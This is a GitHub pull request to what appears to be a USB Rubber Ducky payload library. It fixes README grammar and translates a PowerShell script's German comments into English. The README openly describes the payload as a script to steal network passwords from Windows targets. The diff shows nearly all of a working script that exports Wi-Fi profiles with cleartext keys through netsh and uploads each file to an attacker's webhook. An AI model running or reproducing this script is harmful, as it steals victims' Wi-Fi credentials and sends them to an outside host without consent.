### PR TITLE
Fixed grammar and translated payload

### DIFF
--- a/payloads/library/credentials/WLAN-Windows-Passwords/README.md
+++ b/payloads/library/credentials/WLAN-Windows-Passwords/README.md
@@ -4,16 +4,18 @@ A script used to steal Network Passwords and more from Windows targets
 **Category**: Credentials
 --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 
-## What Version should i use?
+## Which version should I use?
 ### Version 1.0 by [allef-github](https://github.com/aleff-github):
-This version uses a very direct way, is a bit faster then v.2.0 and the PowerShell script is very short, but it only sends the Wifi Name and Password to the webhook and does only work on English Machines.
-Also the Payload has a few more lines.
+This version uses a very direct approach, is a bit faster than v.2.0 and the PowerShell script is very short. 
+But it only sends the Wi-Fi name and password to the webhook and only works on English machines.
+Also the payload has a few more lines.
 
 ### Version 2.0 by [truelockmc](https://github.com/truelockmc):
-This Version works on every Windows Machine, no matter what language your system is.
-Version 2.0 also sends you more Information to the Webhook, and so it also gives you access to networks that are secured with other Methods then Passwords.
-The down side is that Version 2.0 writes stuff on the disk, version 1.0 not, also v.2.0 takes a few seconds longer to execute and the PowerShell script is longer.
-The Payload is shorter and formatted so its easier to read.
+This version works on every Windows machine, no matter what language your system is.
+Version 2.0 also sends more information to the webhook, which also gives you access to networks that are secured with other methods than passwords.
+The downside is that version 2.0 writes data to disk, while version 1.0 doesn't. 
+Also v2.0 takes a few seconds longer to execute and the PowerShell script is longer.
+The payload is shorter and formatted so its easier to read.
 
 ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 ### Further Information for [1.0](https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords/v.1.0_by_allef_github)

--- a/payloads/library/credentials/WLAN-Windows-Passwords/v.2.0_by_truelockmc/script.ps1
+++ b/payloads/library/credentials/WLAN-Windows-Passwords/v.2.0_by_truelockmc/script.ps1
@@ -1,51 +1,51 @@
-# Export-Verzeichnis
+# Export directory
 $exportDir = "$env:temp\SomeStuff"
 
-# Sicherstellen, dass das Exportverzeichnis existiert
+# Ensure that the export directory exists
 if (-not (Test-Path $exportDir)) {
     try {
         New-Item -ItemType Directory -Path $exportDir -Force
     } catch {
-        Write-Host "Fehler beim Erstellen des Exportverzeichnisses: $_"
+        Write-Host "Error while creating the export directory: $_"
         return
     }
 }
 
-# WLAN-Profile exportieren (inkl. Schlüssel)
+# Export Wi-Fi profiles (including keys)
 try {
     netsh wlan export profile key=clear folder=$exportDir
 } catch {
-    Write-Host "Fehler beim Exportieren der WLAN-Profile: $_"
+    Write-Host "Error while exporting Wi-Fi profiles: $_"
     return
 }
 
-# Alle exportierten XML-Dateien lesen
+# Read all exported XML files
 $xmlFiles = Get-ChildItem -Path $exportDir -Filter "*.xml"
 if ($xmlFiles.Count -eq 0) {
-    Write-Host "Keine exportierten WLAN-Profile gefunden."
+    Write-Host "No exported Wi-Fi profiles found."
     return
 }
 
-# Webhook-Anfrage mit Datei-Upload
+# Webhook request with file upload
 foreach ($xmlFile in $xmlFiles) {
     $fileContent = Get-Content -Path $xmlFile.FullName -Raw
 
-    # Bereite die Daten vor
+    # Prepare the data
     $formData = @{
         "username" = "$env:COMPUTERNAME"
-        "content"  = "Hier ist das WLAN-Profil: $($xmlFile.Name)"
+        "content"  = "Here is the Wi-Fi profile: $($xmlFile.Name)"
     }
 
     $formDataFiles = @{
         "file" = New-Object System.IO.FileInfo($xmlFile.FullName)
     }
 
-    # Setze Header für multipart/form-data
+    # Set header for multipart/form-data
     $boundary = [System.Guid]::NewGuid().ToString()
     $contentType = "multipart/form-data; boundary=$boundary"
     $body = ""
 
-    # Füge die Daten hinzu
+    # Add the data
     foreach ($key in $formData.Keys) {
         $body += "--$boundary`r`n"
         $body += "Content-Disposition: form-data; name=`"$key`"`r`n"
@@ -53,7 +53,7 @@ foreach ($xmlFile in $xmlFiles) {
         $body += "$($formData[$key])`r`n"
     }
 
-    # Füge die Datei hinzu
+    # Add the file
     $body += "--$boundary`r`n"
     $body += "Content-Disposition: form-data; name=`"file`"; filename=`"$($formDataFiles['file'].Name)`"`r`n"
     $body += "Content-Type: application/octet-stream`r`n"
@@ -62,17 +62,17 @@ foreach ($xmlFile in $xmlFiles) {
     $body += "`r`n"
     $body += "--$boundary--`r`n"
 
-    # Wandeln Sie den Body in Byte-Daten um
+    # Convert the body into byte data
     $bodyBytes = [System.Text.Encoding]::UTF8.GetBytes($body)
 
-    # Senden Sie die Anfrage
+    # Send the request
     try {
         $response = Invoke-RestMethod -Uri $whuri -Method Post -Body $bodyBytes -Headers @{
             "Content-Type" = $contentType
         }
-        Write-Host "Erfolgreich an den Webhook gesendet: $($xmlFile.Name)"
+        Write-Host "Successfully sent to the webhook: $($xmlFile.Name)"
     } catch {
-        Write-Host "Fehler beim Senden an den Webhook: $_"
+        Write-Host "Error while sending to the webhook: $_"
     }
 }
 


### PR DESCRIPTION
Hi, my English was not "ze jello from ze egg" back when i created version 2.0 for this payload https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords .

In this PR i fixed some grammar mistakes to make the README more readable and i translated my payload into English.

The content of the README or the .ps1 script has not been changed.
I think @aleff-github needs to have a look at this too, because technically it also affects his script.